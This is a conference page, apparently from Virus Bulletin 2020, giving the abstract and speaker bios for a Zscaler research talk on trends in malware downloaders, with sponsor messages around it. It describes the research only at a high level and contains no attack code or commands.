Emerging trends in malware downloaders

Dr. Nirmal Singh (Zscaler), Deepen Desai (Zscaler) & Avinash Kumar (Zscaler)
partner message

ANY.RUN - Interactive malware analysis sandbox

http://any.run/

Get fast results in real-time! Intuitive interface. Convenient for any level analysts.

Join for free and start your malware hunting!

partner message

Avira Cloud Sandbox API. Completely private, unlimited-scale, automated malware analysis service

https://oem.avira.com/en/solutions/cloud-sandbox-api

Avira’s Cloud Sandbox API is built to ensure data privacy.

Receive detailed, file-specific threat intelligence reports containing actionable intelligence.

Supports MITRE ATT&CK™ framework.

partner message

Do APT Mercenary Groups Pose Real Threat to Companies?

https://businessresources.bitdefender.com/apt-as-a-service-webinar

Learn about the recent Bitdefender investigation of a new attack attributed to a sophisticated actor offering advanced-persistent-threats-as-a-service.

Access the investigation

partner message

Be a part of the cyber resilience story - explore careers at

https://careers.opentext.com/

Join the cybersecurity and data protection team at Carbonite + Webroot, OpenText companies.

partner message

We don’t just talk about sharing. We do it every day

https://www.cyberthreatalliance.org/our-sharing-model/

Find out more about how threat intelligence sharing and collaboration through the Cyber Threat Alliance can function as a force multiplier to improve defenses across the ecosystem.

partner message

Map Malicious Infrastructures with Pure Signal™ Intelligence

https://partners.team-cymru.com/pure-signal-trial

Elite analyst teams use Team Cymru’s Pure Signal platform to access 50+ data types, including global network flow, PDNS, malware and more.

Start your 2-week trial now!

partner message

What is cyber threat intelligence (CTI) and how is it used?

Join the VB2020 Threat Intelligence Practitioners’ Summit (TIPS)

Join the VB2020 Threat Intelligence Practitioners’ Summit, sponsored by the Cyber Threat Alliance,

to hear from leading industry voices on how CTI sharing can function as a force multiplier to strengthen defenses across the ecosystem.

partner message

Kaspersky Threat Intelligence Portal - find cyberthreats in files, URLs, IPs and domains

https://opentip.kaspersky.com/

Know which alerts or incidents pose real threats, and prioritize them fast and effectively based on impact and risk levels.

partner message

No-Cost Threat Detection for ISPs and Hosting Providers

https://partners.team-cymru.com/nimbus-threat-monitor

Partner with Team Cymru and get near-real-time threat detection, powered by our world-class IP Reputation data.

Join us now!

partner message

Outsource your Unwanted Software/PUA Work for Free

https://appesteem.com/avs

AppEsteem’s feeds sort out the good apps from the Deceptors.

Our criteria are widely accepted. We’ll help with your disputes.

All for Free. Giving you more time to fight real malware.

partner message

Do you want to know how IT security products score in independent tests?

https://www.av-comparatives.org/enterprise/latest-tests/

AV-Comparatives is an ISO certified independent organization offering systematic testing that checks whether security software lives up to its promises.

Results are available for free!

partner message

Defeating Application Fraud - Learn How

https://www.shapesecurity.com/solutions

We protect more accounts from fraud than everyone else in the world combined.

Shape Security is now part of F5 (www.f5.com)

partner message

30+ years of experience in the anti-malware industry

www.virusbulletin.com

Virus Bulletin is so much more than just a great conference.

Check out our website to see what more we have to offer.

partner message

DNSDB®: The DNS Super Power for Security Teams

https://www.farsightsecurity.com/get-started-guide/

Farsight Security DNSDB®: the world's largest real-time and historical database of DNS resolutions.

Get your free DNSDB API key and use it in our newly updated web GUI, DNSDB Scout and your own environments.

Contextualize everything DNS related with one API key - DNSDB.

partner message

Tired of home office and in urgent need of some networking?

https://www.amtso.org/newsletter/

Join the AMTSO community and meet security vendors, testers, journalists, and researchers to discuss cybersecurity trends, tests and standards!

To compromise a system, malicious actors need to avoid being detected at the entry point. Malware infections are increasing exponentially and so are the attack vectors. Most malware attacks start with a downloader that opens a door for the attack by downloading and installing the malicious modules and payloads. Downloaders are often observed in non-persistent form and delete themselves after installing the malicious payload in the victim's machine. This paper describes the latest trends of downloaders being used in malware delivery by leveraging multiple attack vectors to spread advanced malware. This research focuses specifically on the malware samples targeting enterprise users.

Through this research, we observed that malware attackers are targeting users with clever social engineering tricks, while in some cases, exploits have also been used to download and install malicious payloads onto victims' machines. A common theme in many of these campaigns involved a downloader malware payload being served first, which performs several checks before delivering the target payload on the compromised machine. To illustrate the trend, we have performed a large-scale analysis on a data set of tens of thousands of malicious downloader samples collected from early 2019 to early 2020 in the ZScaler cloud. Furthermore, analysis is done by constructing a taxonomy based on file formats, scripting languages, and behavioural techniques. Our research focused specifically on the downloader payloads being used by multiple threat actors in different attack campaigns over the past year.

We will look at the recent tactics, techniques, and procedures (TTPs) associated with these malicious downloaders in the wild. We will also showcase details of recent attack campaigns leveraging popular file-hosting services (i.e. Google Drives, Dropbox and AWS cloud) to download malicious modules and payloads.

This research will cover:

  • Case studies of obfuscation techniques used in malicious downloaders written in different file formats.

  • In-depth research on shell-code being used as downloader and decryption for several pieces of advanced malware.

  • Learning on techniques used by downloaders to evade detection.

  • Exploitation techniques used by threat actors specifically with downloaders.

  • Challenges in detection and attribution of malicious vs legitimate downloaders.
Dr. Nirmal Singh
Zscaler Nirmal Singh is Senior Manager for the security research team at Zscaler ThreatLabZ located at Chandigarh, India. Nirmal has a Ph.D. in computer science and has been working in the threat research and analysis field for the past 10 years. He oversees malware research, detection and innovation at Zscaler. Prior to Zscaler, he worked with Norman as a manager for the threat response team.
Deepen Desai
Zscaler Deepen Desai is responsible for running the security research operations at Zscaler ThreatLabZ. Deepen has been actively involved in the field of threat research and analysis from past 15 years and has strong affiliations with various security working groups. He is passionate about finding and reverse engineering new malware payloads to neutralize the threat with effective countermeasures. Prior to joining Zscaler, he was a senior threat research manager at Dell SonicWALL. Deepen holds a Master’s of Science in computer engineering from the San Jose State University.
Avinash Kumar
Zscaler Avinash Kumar works in Zscaler ThreatLabZ as a senior security researcher. He has worked in the threat research field for more than nine years. He previously worked at Norman and Genpact as a senior malware analyst. His research areas include malware downloaders with advance malware botnet and analysing the various campaigns on daily basis. Avinash holds Master's degree in computer application from Punjab Technical University. Apart from malware research, he loves to play cricket and table tennis.
arrow left Back

Emerging trends in malware downloaders

Dr. Nirmal Singh (Zscaler), Deepen Desai (Zscaler) & Avinash Kumar (Zscaler)
To compromise a system, malicious actors need to avoid being detected at the entry point. Malware infections are increasing exponentially and so are the attack vectors. Most malware attacks start with a downloader that opens a door for the attack by downloading and installing the malicious modules and payloads. Downloaders are often observed in non-persistent form and delete themselves after installing the malicious payload in the victim's machine. This paper describes the latest trends of downloaders being used in malware delivery by leveraging multiple attack vectors to spread advanced malware. This research focuses specifically on the malware samples targeting enterprise users.

Through this research, we observed that malware attackers are targeting users with clever social engineering tricks, while in some cases, exploits have also been used to download and install malicious payloads onto victims' machines. A common theme in many of these campaigns involved a downloader malware payload being served first, which performs several checks before delivering the target payload on the compromised machine. To illustrate the trend, we have performed a large-scale analysis on a data set of tens of thousands of malicious downloader samples collected from early 2019 to early 2020 in the ZScaler cloud. Furthermore, analysis is done by constructing a taxonomy based on file formats, scripting languages, and behavioural techniques. Our research focused specifically on the downloader payloads being used by multiple threat actors in different attack campaigns over the past year.

We will look at the recent tactics, techniques, and procedures (TTPs) associated with these malicious downloaders in the wild. We will also showcase details of recent attack campaigns leveraging popular file-hosting services (i.e. Google Drives, Dropbox and AWS cloud) to download malicious modules and payloads.

This research will cover:

  • Case studies of obfuscation techniques used in malicious downloaders written in different file formats.

  • In-depth research on shell-code being used as downloader and decryption for several pieces of advanced malware.

  • Learning on techniques used by downloaders to evade detection.

  • Exploitation techniques used by threat actors specifically with downloaders.

  • Challenges in detection and attribution of malicious vs legitimate downloaders.
Dr. Nirmal Singh
Zscaler Nirmal Singh is Senior Manager for the security research team at Zscaler ThreatLabZ located at Chandigarh, India. Nirmal has a Ph.D. in computer science and has been working in the threat research and analysis field for the past 10 years. He oversees malware research, detection and innovation at Zscaler. Prior to Zscaler, he worked with Norman as a manager for the threat response team.
Deepen Desai
Zscaler Deepen Desai is responsible for running the security research operations at Zscaler ThreatLabZ. Deepen has been actively involved in the field of threat research and analysis from past 15 years and has strong affiliations with various security working groups. He is passionate about finding and reverse engineering new malware payloads to neutralize the threat with effective countermeasures. Prior to joining Zscaler, he was a senior threat research manager at Dell SonicWALL. Deepen holds a Master’s of Science in computer engineering from the San Jose State University.
Avinash Kumar
Zscaler Avinash Kumar works in Zscaler ThreatLabZ as a senior security researcher. He has worked in the threat research field for more than nine years. He previously worked at Norman and Genpact as a senior malware analyst. His research areas include malware downloaders with advance malware botnet and analysing the various campaigns on daily basis. Avinash holds Master's degree in computer application from Punjab Technical University. Apart from malware research, he loves to play cricket and table tennis.